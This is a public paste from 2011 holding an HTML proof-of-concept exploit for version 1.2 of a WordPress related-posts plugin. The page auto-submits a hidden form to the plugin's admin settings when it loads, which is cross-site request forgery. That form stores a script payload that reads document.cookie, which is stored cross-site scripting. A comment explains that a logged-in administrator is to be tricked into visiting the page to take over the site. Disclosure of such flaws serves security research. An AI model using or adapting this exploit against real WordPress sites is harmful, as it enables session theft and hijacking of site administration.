Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

woprdress plugin security

By: a guest on Dec 15th, 2011  |  syntax: HTML  |  size: 0.73 KB  |  hits: 107  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <html>
  2. <head>
  3. <title>woprdress</title>
  4. <!--
  5.  
  6. wordpress-23-related-posts-plugin 1.2 csrf/xss/script insertion security bug
  7. by: marty_the_dns_guru
  8. http://wordpress.org/extend/plugins/wordpress-23-related-posts-plugin/
  9.  
  10. trick the wordpress admin into visiting this page while logged in, and ..
  11. _hostile take-over_!
  12.  
  13. -->
  14. </head>
  15. <body onload="document.forms['form1'].submit();">
  16. <form method="post" action="http://[host]/wp-admin/options-general.php?page=wp_related_posts.php" id="form1">
  17. <input type="hidden" name="wp_rp_title_option" value="&quot;&gt;&lt;script&gt;alert(/enemy missile!enemy missile!/ + document.cookie);&lt;/script&gt;">
  18. <input type="hidden" name="wp_rp_Submit" value="Save changes">
  19. </form>
  20. </body>
  21. </html>
create a new version of this paste RAW Paste Data